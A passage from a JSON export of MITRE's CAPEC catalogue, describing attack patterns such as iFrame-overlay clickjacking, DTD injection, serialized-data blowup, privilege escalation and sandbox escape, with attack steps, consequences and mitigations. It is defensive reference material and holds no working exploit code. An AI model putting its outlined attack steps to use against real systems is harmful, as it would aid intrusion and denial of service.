on.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"103","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Craft an iFrame Overlay page] The attacker crafts a malicious iFrame overlay page.","Technique":"The attacker leverages iFrame overlay capabilities to craft a malicious iFrame overlay page."},{"Step":"2","Phase":"Exploit","Description":"[Attacker tricks victim to load the iFrame overlay page] Attacker utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.","Technique":["Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.","Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.","Trick the victim to the malicious site through a cross-site scripting attack."]},{"Step":"3","Phase":"Exploit","Description":"[Trick victim into interacting with the iFrame overlay page in the desired manner] The attacker tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim\'s level of privilege.","Technique":["Hide action controls over very commonly used functionality.","Hide action controls over very psychologically tempting content."]}]},"Prerequisites":{"Prerequisite":"The victim is communicating with the target application via a web based UI and not a thick client. The victim\'s browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system\'s interaction window is open in the victim\'s browser and supports the ability for initiating sensitive actions on behalf of the user in the target system."},"Skills_Required":{"Skill":["Crafting the proper malicious site and luring the victim to this site is not a trivial task.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Configuration: Disable iFrames in the Web browser.","Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.","Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames."]},"Example_Instances":{"Example":"The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \\"Don\'t Click.\\" This button is aligned with the invisible \\"Update\\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"References":{"Reference":[{"External_Reference_ID":"REF-84"},{"External_Reference_ID":"REF-85"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"224":{"ID":"224","Name":"Fingerprinting","Abstraction":"Meta","Status":"Stable","Description":"An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.","Likelihood_Of_Attack":"High","Typical_Severity":"Very Low","Prerequisites":{"Prerequisite":"A means by which to interact with the target system directly."},"Skills_Required":{"Skill":["Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application\'s functionality as much as possible."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"45","Entry_Name":"Fingerprinting"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Taxonomy_Mappings"}]}},"226":{"ID":"226","Name":"Session Credential Falsification through Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server. For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"196"}},"Prerequisites":{"Prerequisite":"The targeted application must use session credentials to identify legitimate users."},"Resources_Required":{"Resource":"An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"565"},{"CWE_ID":"472"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"227":{"ID":"227","Name":"Sustained Client Engagement","Abstraction":"Meta","Status":"Draft","Description":"An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary\'s primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource. The degree to which the attack is successful depends upon the adversary\'s ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target\'s ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.","Prerequisites":{"Prerequisite":"This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame."},"Resources_Required":{"Resource":"To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests."},"Mitigations":{"Mitigation":"Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses."},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499","Entry_Name":"Endpoint Denial of Service"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"228":{"ID":"228","Name":"DTD Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker injects malicious content into an application\'s DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"250"},{"Nature":"CanPrecede","CAPEC_ID":"197"},{"Nature":"CanPrecede","CAPEC_ID":"491"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.","Technique":["Use an automated tool to record all instances of URLs to process XML requests.","Use a browser to manually explore the website and analyze how the application processes XML requests."]},{"Step":"2","Phase":"Explore","Description":"[Determine use of XML with DTDs] Examine application input to identify XML input that leverage the use of one or more DTDs.","Technique":["Examine any available documentation for the application that discusses expected XML input.","Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD."]},{"Step":"3","Phase":"Exploit","Description":"[Craft and inject XML containg malicious DTD payload]","Technique":["Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.","Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts."]}]},"Prerequisites":{"Prerequisite":"The target must be running an XML based application that leverages DTDs."},"Mitigations":{"Mitigation":["Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.","Implementation: Disallow the inclusion of DTDs as part of incoming messages.","Implementation: Use XML parsing tools that protect against DTD attacks."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"References":{"Reference":{"External_Reference_ID":"REF-86"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"229":{"ID":"229","Name":"Serialized Data Parameter Blowup","Abstraction":"Detailed","Status":"Draft","Description":"This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"231"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.","Technique":["Use an automated tool to record all instances of URLs to process requests from serialized data.","Use a browser to manually explore the website and analyze how the application processes requests using serialized data."]},{"Step":"2","Phase":"Exploit","Description":"[Launch a Blowup attack] The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.","Technique":"Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service."}]},"Prerequisites":{"Prerequisite":"The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)"},"Mitigations":{"Mitigation":["This attack may be mitigated completely by using a parser that is not using a vulnerable container.","Mitigation may limit the number of configuration parameters per dataset."]},"Example_Instances":{"Example":[{"p":["In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).","A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources."],"div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative"}]},{"p":"A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. This may lead to denial of service or instability resulting from excessive resource consumption."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"41","Entry_Name":"XML Attribute Blowup"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Description, Description Summary, Examples-Instances, Injection_Vector, Methods_of_Attack, Payload, Related_Attack_Patterns, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["XML Attribute Blowup",{"Date":"2020-07-30"}]}},"230":{"ID":"230","Name":"Serialized Data with Nested Payloads","Abstraction":"Standard","Status":"Draft","Description":"Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.","Extended_Description":{"p":["An adversary\'s goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].","This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends."]},"Alternate_Terms":{"Alternate_Term":{"Term":"XML Denial of Service (XML DoS)"}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim\'s side."},{"Step":"2","Phase":"Exploit","Description":"An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim\'s system."}]},"Prerequisites":{"Prerequisite":["An application\'s user-controllable data is expressed in a language that supports subsitution.","An application does not perform sufficient validation to ensure that user-controllable data is not malicious."]},"Indicators":{"Indicator":"Bad data is passed to the data parser (possibly repeatedly), possibly making it crash or execute arbitrary code."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. Ensure that the resultant data is safe to pass to the data parser.","Perform validation on canonical data.","Pick a robust implementation of the data parser."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"112"},{"CWE_ID":"20"},{"CWE_ID":"674"},{"CWE_ID":"770"}]},"References":{"Reference":{"External_Reference_ID":"REF-89","Section":"What is an XML Parser Attack?"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Alternate_Terms, Description, Execution_Flow, Indicators, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name, Description, Execution_Flow, Extended_Description, Indicators, Mitigations, Prerequisites, Skills_Required"}],"Previous_Entry_Name":["XML Nested Payloads",{"Date":"2021-10-21"}]}},"231":{"ID":"231","Name":"Oversized Serialized Data Payloads","Abstraction":"Standard","Status":"Draft","Description":"Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary\'s goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider\'s memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.","Alternate_Terms":{"Alternate_Term":{"Term":"XML Denial of Service (XML DoS)"}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"An adversary determines the input data stream that is being processed by an serialized data parser on the victim\'s side."},{"Step":"2","Phase":"Experiment","Description":"An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim\'s system."}]},"Prerequisites":{"Prerequisite":["An application uses an parser for serialized data to perform transformation on user-controllable data.","An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser."]},"Skills_Required":{"Skill":["Denial of service",{"Level":"Low"},"Arbitrary code execution",{"Level":"High"}]},"Indicators":{"Indicator":"Bad data is passed to the serialized data parser (possibly repeatedly), possibly making it crash or execute arbitrary code."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. Ensure that the resultant data is safe to pass to the parser.","Perform validation on canonical data.","Pick a robust implementation of the serialized data parser.","Validate data against a valid schema or DTD prior to parsing."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"112"},{"CWE_ID":"20"},{"CWE_ID":"674"},{"CWE_ID":"770"}]},"References":{"Reference":{"External_Reference_ID":"REF-89","Section":"What is an XML Parser Attack?"}},"Notes":{"Note":["In many cases this type of an attack will result in an XML Denial of Service (XDoS) or similar Denial of Service (DoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].",{"Type":"Other"},"The main weakness in serialized data related DoS is that the service provider generally must inspect, parse, and validate the data messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that DoS targets.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Alternate_Terms, Description, Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Execution_Flow, Indicators, Mitigations, Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["XML Oversized Payloads",{"Date":"2020-07-30"}]}},"233":{"ID":"233","Name":"Privilege Escalation","Abstraction":"Meta","Status":"Draft","Description":"An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.","Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"269"},{"CWE_ID":"1264"},{"CWE_ID":"1311"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1548","Entry_Name":"Abuse Elevation Control Mechanism"}},"References":{"Reference":{"External_Reference_ID":"REF-600","Section":"Testing for Privelege Escalation"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description, Description Summary, Relationships, Type (Category -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Abstraction"}]}},"234":{"ID":"234","Name":"Hijacking a privileged process","Abstraction":"Standard","Status":"Draft","Description":"An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanFollow","CAPEC_ID":"242"},{"Nature":"CanFollow","CAPEC_ID":"175"},{"Nature":"CanFollow","CAPEC_ID":"100"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find process with elevated priveleges] The adversary probes for processes running with elevated privileges.","Technique":["On Windows, use the process explorer\'s security tab to see if a process is running with administror privileges.","On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user."]},{"Step":"2","Phase":"Experiment","Description":"[Find vulnerability in running process] The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.","Technique":["Look for improper input validation","Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.","Utilize system utilities that support process control that have been inadequately secured"]},{"Step":"3","Phase":"Exploit","Description":"[Execute arbitrary code] The adversary exploits the vulnerability that they have found and hijacks the running process."}]},"Prerequisites":{"Prerequisite":"The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"648"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"}]}},"237":{"ID":"237","Name":"Escaping a Sandbox by Calling Code in Another Language","Abstraction":"Detailed","Status":"Draft","Description":"The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"480"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probing] The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.","Technique":"The attacker probes the target application to see whether calling code of another language is allowed within a sandbox."},{"Step":"2","Phase":"Explore","Description":"[Analysis] The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.","Technique":"The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox."},{"Step":"3","Phase":"Experiment","Description":"[Verify the exploitable security weaknesses] The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.","Technique":"The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox."},{"Step":"4","Phase":"Exploit","Description":"[Exploit the security weaknesses in the standard libraries] The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.","Technique":"The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries."}]},"Skills_Required":{"Skill":["The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.","Design: Use obfuscation and other techniques 